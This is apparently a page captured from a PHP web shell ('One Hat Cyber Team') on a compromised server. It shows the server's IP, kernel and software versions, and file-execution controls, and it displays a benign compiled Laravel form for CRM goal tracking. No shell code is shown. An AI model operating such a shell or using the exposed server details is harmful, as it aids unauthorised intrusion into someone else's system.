⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
storage
/
framework
/
views
/
View File Name :
915c9e8c48757df7047515ee3b757108.php
<?php echo e(Form::open(array('url'=>'goaltracking','method'=>'post'))); ?> <div class="modal-body"> <?php $plan= \App\Models\Utility::getChatGPTSettings(); ?> <?php if($plan->chatgpt == 1): ?> <div class="text-end"> <a href="#" data-size="md" class="btn btn-primary btn-icon btn-sm" data-ajax-popup-over="true" data-url="<?php echo e(route('generate',['goal tracking'])); ?>" data-bs-placement="top" data-title="<?php echo e(__('Generate content with AI')); ?>"> <i class="fas fa-robot"></i> <span><?php echo e(__('Generate with AI')); ?></span> </a> </div> <?php endif; ?> <div class="row"> <div class="col-md-6"> <div class="form-group"> <?php echo e(Form::label('branch',__('Branch'),['class'=>'form-label'])); ?> <?php echo e(Form::select('branch',$brances,null,array('class'=>'form-control select','required'=>'required'))); ?> </div> </div> <div class="col-md-6"> <div class="form-group"> <?php echo e(Form::label('goal_type',__('GoalTypes'),['class'=>'form-label'])); ?> <?php echo e(Form::select('goal_type',$goalTypes,null,array('class'=>'form-control select','required'=>'required'))); ?> </div> </div> <div class="col-md-6"> <div class="form-group"> <?php echo e(Form::label('start_date',__('Start Date'),['class'=>'form-label'])); ?> <?php echo e(Form::date('start_date',null,array('class' => 'form-control '))); ?> </div> </div> <div class="col-md-6"> <div class="form-group"> <?php echo e(Form::label('end_date',__('End Date'),['class'=>'form-label'])); ?> <?php echo e(Form::date('end_date',null,array('class' => 'form-control '))); ?> </div> </div> <div class="col-md-12"> <div class="form-group"> <?php echo e(Form::label('subject',__('Subject'),['class'=>'form-label'])); ?> <?php echo e(Form::text('subject',null,array('class'=>'form-control'))); ?> </div> </div> <div class="col-md-12"> <div class="form-group"> <?php echo e(Form::label('target_achievement',__('Target Achievement'),['class'=>'form-label'])); ?> <?php echo e(Form::text('target_achievement',null,array('class'=>'form-control'))); ?> </div> </div> <div class="col-md-12"> <div class="form-group"> <?php echo e(Form::label('description',__('Description'),['class'=>'form-label'])); ?> <?php echo e(Form::textarea('description',null,array('class'=>'form-control description'))); ?> </div> </div> <div class="col-md-12"> <div class="form-group"> <?php echo e(Form::label('status',__('Status'),['class'=>'form-label'])); ?> <?php echo e(Form::select('status',$status,null,array('class'=>'form-control select'))); ?> </div> </div> <div class="col-md-12"> <fieldset id='demo1' class="rating"> <input class="stars" type="radio" id="rating-5" name="rating" value="5" > <label class="full" for="rating-5" title="Awesome - 5 stars"></label> <input class="stars" type="radio" id="rating-4" name="rating" value="4" > <label class="full" for="rating-4" title="Pretty good - 4 stars"></label> <input class="stars" type="radio" id="rating-3" name="rating" value="3" > <label class="full" for="rating-3" title="Meh - 3 stars"></label> <input class="stars" type="radio" id="rating-2" name="rating" value="2" > <label class="full" for="rating-2" title="Kinda bad - 2 stars"></label> <input class="stars" type="radio" id="technical-1" name="rating" value="1" > <label class="full" for="technical-1" title="Sucks big time - 1 star"></label> </fieldset> </div> </div> <div class="modal-footer"> <input type="button" value="<?php echo e(__('Cancel')); ?>" class="btn btn-light" data-bs-dismiss="modal"> <input type="submit" value="<?php echo e(__('Create')); ?>" class="btn btn-primary"> </div> </div> <?php echo e(Form::close()); ?> <?php /**PATH /var/www/crm/resources/views/goaltracking/create.blade.php ENDPATH**/ ?>